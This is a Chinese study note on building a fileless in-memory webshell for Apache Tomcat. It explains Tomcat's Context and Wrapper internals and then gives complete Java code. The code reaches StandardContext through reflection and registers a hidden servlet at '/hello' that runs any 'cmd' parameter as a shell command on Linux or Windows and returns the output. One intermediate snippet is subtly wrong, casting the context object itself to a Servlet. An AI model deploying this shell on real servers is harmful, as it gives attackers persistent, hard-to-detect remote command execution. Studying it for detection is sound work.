内存马学习笔记(二)

severlet内存马

还是那两句话

Servlet、Listener、Filter 由 javax.servlet.ServletContext 去加载

Servlet 3.0 API 允许使 ServletContext 用动态进行注册

先分析流程

createstandard context=StandardEngine[Catalina].StandardHost[localhost].StandardContext[/tomcat_war]

catalina 就是Tomcat服务器使用的 Apache实现的servlet容器的 名字。

Tomcat的核心分为3个部分:

(1)Web容器—处理静态页面; (2)catalina — 一个servlet容器—–处理servlet; (3)还有就是JSP容器,它就是把jsp页面翻译成一般的servlet。

对于tomcat的目录来说,webapps目录对应的就是 Host 组件,下面的 casmanager 等一个个webapp对应的就是 Context 组件,Wrapper 就是容器内的 Servlet了

接着根据hostconfig类manageapp方法,通过 addchild,把Wrapper 装载到severlet

然后就是child.start(),然后一系列filter就进入了service方法

在servelet装载前 org.apache.catalina.core.StandardContext#startInternal()中表明了Tomcat启动加载的顺序:Listener -> Filter -> Servlet

同时也要注意这里的 loadOnStartup,对于他我们需要满足一些条件

写exp

先创立一个恶意的servlet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Servlet servlet = new Servlet() {
            public void init(ServletConfig config) throws ServletException {

            }

            public ServletConfig getServletConfig() {
                return null;
            }

            public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
                String cmd = req.getParameter("cmd");
                boolean isLinux=true;
                String property = System.getProperty("os.name");
                //获取当前操作系统的名字,property财产,所有物
                if(property!=null&&property.toLowerCase().contains("win")){
                    isLinux=false;
                }
                String[] cmds = isLinux ? new String[]{"bin/sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                //利用“bin/sh”下的解释器,参数是 -c,表示后面的参数将已命名执行,执行的命令是ps -ef | grep java,查看所有进程,利用管道符把结果传给右边
                InputStream inputStream = Runtime.getRuntime().exec(cmds).getInputStream();
                //getinputstream()用来读取输出结果
                Scanner scanner = new Scanner(inputStream).useDelimiter("\\a");
                String s = scanner.hasNext() ? scanner.next() : "";
                PrintWriter writer = res.getWriter();
                writer.println(s);
                writer.flush();
                writer.close();
            }

            public String getServletInfo() {
                return null;
            }

            public void destroy() {

            }
        };

servletcontext#addservlet被ApplicationContextFacade调用,根本是在ApplicationContext类实现

addservlet:

根据servletName获取wrapper,(这里的createwrapper是调用的standardcontext里的方法)通过addchild添加到context里面,并添加一些信息,返回ApplicationServletRegistration

可以通过如下代码实现:

1
2
3
4
5
6
7
8
StandardContext servletContext = (StandardContext)req.getSession().getServletContext();
     Wrapper mywrapper = servletContext.createWrapper();
     mywrapper.setName("mywapper");
     mywrapper.setServletClass(servletContext.getClass().getName());
     mywrapper.setLoadOnStartup(1);
     // 设置为1才会将Servlet添加至容器
     // 当值为0或者大于0时,表示容器在应用启动时就加载这个servlet;读取 web.xml中的每个Servlet 或者新建Servlet 默认是 -1
     mywrapper.setServlet((Servlet) servletContext);

正常时wrapper装载到context,而我们是把当前context装载到mywrapper

但是现在的wrapper并不在 StandardContext 的 children 里面,可以通过 StandardContext#addChild 把它加到 StandardContext 的 children 当中。

addchild中除了把wrapper添加进去,还进行了遍历,添加servletMappings

可以通过如下代码实现:

1
2
servletContext.addChild(myWrapper);
servletContext.addServletMapping("/testservlet","mywapper");

最终版本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
import org.apache.catalina.Wrapper;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.StandardContext;
import javax.servlet.*;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.Scanner;

@WebServlet("/*")
public class evilservlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try{
            String urlPattern = "/hello";
            //String urlPattern = "*";
            String servletName = "hello";
            // 从 request 中获取 servletContext
            ServletContext servletContext = req.getSession().getServletContext();
            // 如果已有此 servletName 的 Servlet,则不再重复添加
            if(servletContext.getServletRegistration(servletName) == null) {
                Field servletfield = servletContext.getClass().getDeclaredField("context");
                servletfield.setAccessible(true);
                ApplicationContext applicationContext = (ApplicationContext) servletfield.get(servletContext);

                Field contextfield = applicationContext.getClass().getDeclaredField("context");
                contextfield.setAccessible(true);
                StandardContext standardContext = (StandardContext) contextfield.get(applicationContext);


                //新建servlet
                Servlet servlet = new Servlet() {
                    public void init(ServletConfig servletConfig) throws ServletException {

                    }
                    public ServletConfig getServletConfig() {
                        return null;
                    }
                    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
                        String cmd = servletRequest.getParameter("cmd");
                        boolean isLinux = true;
                        String osTyp = System.getProperty("os.name");
                        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                            isLinux = false;
                        }
                        String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                        InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                        Scanner s = new Scanner(in).useDelimiter("\\a");
                        String output = s.hasNext() ? s.next() : "";
                        PrintWriter out = servletResponse.getWriter();
                        out.println(output);
                        out.flush();
                        out.close();
                    }
                    public String getServletInfo() {
                        return null;
                    }
                    public void destroy() {

                    }
                };

                // 使用 Wrapper 封装 Servlet
                Wrapper wrapper = standardContext.createWrapper();
                wrapper.setLoadOnStartup(1);
                wrapper.setName(servletName);
                wrapper.setServlet(servlet);
                wrapper.setServletClass(servlet.getClass().getName());
                // 向 children 中添加 wrapper
                standardContext.addChild(wrapper);
                // 添加 servletMappings
                standardContext.addServletMapping(urlPattern, servletName);
                PrintWriter writer = resp.getWriter();
                writer.println("inject success !");
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

参考连接